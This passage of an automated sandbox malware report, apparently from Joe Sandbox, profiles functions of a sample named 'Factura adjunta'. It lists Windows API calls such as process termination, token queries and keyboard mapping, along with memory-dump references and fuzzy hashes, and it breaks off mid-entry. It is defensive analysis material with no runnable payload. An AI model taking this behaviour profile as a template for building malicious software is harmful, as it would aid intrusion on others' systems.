                              • Part of subcall function 008085F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0080863E
                            • GetLengthSid.ADVAPI32(?,00000000,00808977), ref: 00808DAC
                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00808DB8
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00808DBF
                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00808DD8
                            • GetProcessHeap.KERNEL32(00000000,00000000,00808977), ref: 00808DEC
                            • HeapFree.KERNEL32(00000000), ref: 00808DF3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                            • String ID:
                            • API String ID: 169236558-0
                            • Opcode ID: b2309b10e784dfcd256b4f15f885ec3471ed4e1f0f9dc5ceefbf8edb99c956de
                            • Instruction ID: 04d34edde55f4cfd107879ad4f55e716f6c7752d73908a84fcc50881c2b95c39
                            • Opcode Fuzzy Hash: b2309b10e784dfcd256b4f15f885ec3471ed4e1f0f9dc5ceefbf8edb99c956de
                            • Instruction Fuzzy Hash: 0411E131900604FFDB54AF64DC08BAE7B69FF91315F104629E985D3291CB319984DBA0
                            Function 0083C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007B134D
                              • Part of subcall function 007B12F3: SelectObject.GDI32(?,00000000), ref: 007B135C
                              • Part of subcall function 007B12F3: BeginPath.GDI32(?), ref: 007B1373
                              • Part of subcall function 007B12F3: SelectObject.GDI32(?,00000000), ref: 007B139C
                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0083C1C4
                            • LineTo.GDI32(00000000,00000003,?), ref: 0083C1D8
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0083C1E6
                            • LineTo.GDI32(00000000,00000000,?), ref: 0083C1F6
                            • EndPath.GDI32(00000000), ref: 0083C206
                            • StrokePath.GDI32(00000000), ref: 0083C216
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                            • String ID:
                            • API String ID: 43455801-0
                            • Opcode ID: 4a4ed4d5d13bb8bc857670721bdef46941a708f39c82875be6c5e459d20df52c
                            • Instruction ID: 777598b1b8e671c7a44a9f47b10a199267f44fe6155cb0c078cb896fb9faac20
                            • Opcode Fuzzy Hash: 4a4ed4d5d13bb8bc857670721bdef46941a708f39c82875be6c5e459d20df52c
                            • Instruction Fuzzy Hash: 4B11097640010DBFDB129F94DC88EEA7FADFF08354F048421BA189A162D7719E95DBA0
                            Function 007D03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D03D3
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 007D03DB
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D03E6
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D03F1
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 007D03F9
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D0401
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
                            • Instruction ID: 2389469e46fcc0e0310954b44cfb06e1967d85eacf42f9a60f082ba8443034ae
                            • Opcode Fuzzy Hash: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
                            • Instruction Fuzzy Hash: 730148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847942C7B5A864CBE5
                            Function 0081568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0081569B
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008156B1
                            • GetWindowThreadProcessId.USER32(?,?), ref: 008156C0
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008156CF
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008156D9
                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008156E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
                            • Instruction ID: 287d1437ae5ff4667f7e81399699d645259c22c6908f0f62805f7dc9d2c6a15c
                            • Opcode Fuzzy Hash: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
                            • Instruction Fuzzy Hash: ACF01D32A41558BBE7215BA2AC0EEEF7B7CFFD6B11F000569FA05D1062A7A11A0186F5
                            Function 008174D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 008174E5
                            • RtlEnterCriticalSection.NTDLL(?), ref: 008174F6
                            • TerminateThread.KERNEL32(00000000,000001F6,?,007C1044,?,?), ref: 00817503
                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007C1044,?,?), ref: 00817510
                              • Part of subcall function 00816ED7: CloseHandle.KERNEL32(00000000,?,0081751D,?,007C1044,?,?), ref: 00816EE1
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00817523
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0081752A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
                            • Instruction ID: d6960b50a2b69c15fbf373fb9f5265c28622fd989b8945a656084172590bc7d2
                            • Opcode Fuzzy Hash: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
                            • Instruction Fuzzy Hash: 8DF05E3A940612EBDB122B64FD8CDEB773AFF85302B100935F742910B2DBB55895CB90
                            Function 00828902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00828928
                            • CharUpperBuffW.USER32(?,?), ref: 00828A37
                            • VariantClear.OLEAUT32(?), ref: 00828BAF
                              • Part of subcall function 00817804: VariantInit.OLEAUT32(00000000), ref: 00817844
                              • Part of subcall function 00817804: VariantCopy.OLEAUT32(00000000,?), ref: 0081784D
                              • Part of subcall function 00817804: VariantClear.OLEAUT32(00000000), ref: 00817859
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: 0a4f49b933374c2ce23e74c7ff3a82f89cc1dec849f4d990ec24fced709c4243
                            • Instruction ID: 3c2c98fd19582e045fbc1f21b1af03c1be6065851d99a8f46ef85a051d79efd5
                            • Opcode Fuzzy Hash: 0a4f49b933374c2ce23e74c7ff3a82f89cc1dec849f4d990ec24fced709c4243
                            • Instruction Fuzzy Hash: B8914971608311DFCB10DF28D48495ABBE4FF89314F04896EF996DB261DB31E985CB52
                            Function 00812F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007CFEC6: _wcscpy.LIBCMT ref: 007CFEE9
                            • _memset.LIBCMT ref: 00813077
                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008130A6
                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00813159
                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00813187
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                            • String ID: 0
                            • API String ID: 4152858687-4108050209
                            • Opcode ID: b20c6d325d6b8469794d34a8be19096dd070a914bec164b4a27acde1e975394f
                            • Instruction ID: 1a6973a9cd93a7151bca33faad10622a9cbd8f519d175c7460bad7fa125cab92
                            • Opcode Fuzzy Hash: b20c6d325d6b8469794d34a8be19096dd070a914bec164b4a27acde1e975394f
                            • Instruction Fuzzy Hash: 2951A271608301ABD7259F28D849AEBBBECFF45364F04492DF895D3291DB74CA84C792
                            Function 00839A63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(00E9EBB8,?), ref: 00839AD2
                            • ScreenToClient.USER32(00000002,00000002), ref: 00839B05
                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00839B72
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID: h)
                            • API String ID: 3880355969-3328819710
                            • Opcode ID: 5959d8dd06d583ad9efeb7e6cffc36386c9a1b8f915373926a65578790420a21
                            • Instruction ID: f605029b45a4263ececbbce9cb0040982d01cd288fd160a4157ed68f3b9b8a7f
                            • Opcode Fuzzy Hash: 5959d8dd06d583ad9efeb7e6cffc36386c9a1b8f915373926a65578790420a21
                            • Instruction Fuzzy Hash: 30516D34A00219EFCF10DF58E8819AE7BB5FF84320F148269F955DB290D770AD91CB90
                            Function 00812C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00812CAF
                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00812CCB
                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00812D11
                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00876890,00000000), ref: 00812D5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                            • Instruction ID: d14674addee0bf1d6ea45d5c8794d8ebc2f17f945b353a8f20fa35230bf13762
                            • Opcode Fuzzy Hash: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                            • Instruction Fuzzy Hash: 4C41AE302043459FD720DF28D844B9ABBE8FF85320F00466DF966D72A1D770E954CB92
                            Function 00838AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00838B4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: h)
                            • API String ID: 634782764-3328819710
                            • Opcode ID: d0dd7fdd8799e196d318b25760ed8db0e852333d39ea86435454d75fd5147721
                            • Instruction ID: 6c12085a89fd1a0cf842327f05632bc0942947d0a2601ff4e1d3f53b7c657f7e
                            • Opcode Fuzzy Hash: d0dd7fdd8799e196d318b25760ed8db0e852333d39ea86435454d75fd5147721
                            • Instruction Fuzzy Hash: 3831E6B4600319FFEF209E28CC45FA9B764FB85334F244912FA55D72A1DE30A9508BD1
                            Function 0083ADF1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 0083AE1A
                            • GetWindowRect.USER32(?,?), ref: 0083AE90
                            • PtInRect.USER32(?,?,0083C304), ref: 0083AEA0
                            • MessageBeep.USER32(00000000), ref: 0083AF11
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID: h)
                            • API String ID: 1352109105-3328819710
                            • Opcode ID: 5be9f9d373a1029e4b62872640badee22c51ad4869293500ee7158f032d92b18
                            • Instruction ID: 2769834124ac7a7b5a02b1d6cdd43c24bf8471ba71bac49cc77961517cf67830
                            • Opcode Fuzzy Hash: 5be9f9d373a1029e4b62872640badee22c51ad4869293500ee7158f032d92b18
                            • Instruction Fuzzy Hash: A9416C70A00119DFCB19CF58C888A69BBF5FB89350F1881A9E998DB255D730E941DFD2
                            Function 0082DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082DAD9
                              • Part of subcall function 007B79AB: _memmove.LIBCMT ref: 007B79F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharLower_memmove
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 3425801089-567219261
                            • Opcode ID: 677bf1c33ecdb99ea2bcbbb6ae09a89e5284960d56e1139688165aaf5bfe0a0d
                            • Instruction ID: 62d48397e78e9b599af2f9e430d55d8d927c4b7823551df60a72f59915530135
                            • Opcode Fuzzy Hash: 677bf1c33ecdb99ea2bcbbb6ae09a89e5284960d56e1139688165aaf5bfe0a0d
                            • Instruction Fuzzy Hash: 7531B371500619EFCF00EFA4C890AEEB7B4FF05320B00862AE865E77D1CB35A945CB80
                            Function 00809372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008093F6
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00809409
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00809439
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove$ClassName
                            • String ID: ComboBox$ListBox
                            • API String ID: 365058703-1403004172
                            • Opcode ID: 97487c02fb9c4023202ca338262c04e6e01963b7b4e82e8d39f2f391499dec8e
                            • Instruction ID: 196a17e5f0ee4dc27ce31cfd7a79dbfc65436e0df45d4f00e02df80ddd7ebceb
                            • Opcode Fuzzy Hash: 97487c02fb9c4023202ca338262c04e6e01963b7b4e82e8d39f2f391499dec8e
                            • Instruction Fuzzy Hash: 8021D271900108AEDB18AB64DC8ADFEBB7CEF45350B114519F965D72E2DB39090AD650
                            Function 00836656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                              • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                              • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008366D0
                            • LoadLibraryW.KERNEL32(?), ref: 008366D7
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008366EC
                            • DestroyWindow.USER32(?), ref: 008366F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 27baeb67c495812fe26cadf670e4bc739da83c257166fbc525569b6d2cf24f01
